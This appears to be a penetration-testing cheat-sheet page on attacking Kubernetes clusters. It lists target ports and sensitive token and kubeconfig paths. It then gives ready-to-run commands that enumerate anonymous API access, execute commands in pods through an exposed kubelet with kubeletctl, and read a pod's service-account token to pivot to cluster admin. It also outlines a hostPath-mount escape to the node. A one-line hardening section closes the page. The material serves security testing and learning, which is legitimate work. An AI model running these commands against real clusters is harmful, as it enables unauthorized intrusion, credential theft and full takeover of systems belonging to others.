Kubernetes
aka k8s, kubelet
Container orchestration. The API server on 6443 and the kubelet on 10250 are the targets — anonymous API access or an exposed kubelet lets you run commands in pods and steal service-account tokens to take over the cluster.
Ports
| Port | Proto | Notes |
|---|---|---|
6443 | tcp | kube-apiserver |
10250 | tcp | kubelet API |
2379 | tcp | etcd (cluster secrets) |
Fingerprint
- 6443 serves the Kubernetes API (TLS); /version returns the build
- 10250 kubelet responds to /pods
Key files
| Path | Holds | Sensitive |
|---|---|---|
/var/run/secrets/kubernetes.io/serviceaccount/token | pod service-account JWT | sensitive |
/etc/kubernetes/admin.conf | cluster-admin kubeconfig | sensitive |
Exploitation primitives
- Anonymous API access → check rights with `kubectl auth can-i --list`
- Exposed kubelet (10250) → list pods and exec commands with kubeletctl
- Steal a pod's service-account token, then pivot via the API; mount hostPath / to escape to the node
Overview
Kubernetes runs containers across nodes. The two reachable attack surfaces are the API server (6443) and the kubelet (10250); from either you aim to run commands in pods and harvest tokens to escalate to cluster admin.
Enumerate the API server
Version + anonymous access:
curl -k https://<TARGET>:6443/versionWhat can the anonymous/your token do:
kubectl --server=https://<TARGET>:6443 --insecure-skip-tls-verify auth can-i --listAttack the kubelet (10250)
List pods:
kubeletctl -i --server <TARGET> podsRun a command in a pod:
kubeletctl -i --server <TARGET> exec "id" -p <pod> -c <container>Steal a pod’s service-account token, then drive the API:
kubeletctl -i --server <TARGET> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p <pod> -c <container>Node escape
Deploy a pod that hostPath-mounts / to read/write the host filesystem (privileged pod → node root).
Hardening
Disable anonymous auth, require kubelet authn/authz (--anonymous-auth=false), apply RBAC least-privilege, and restrict pod hostPath/privileged.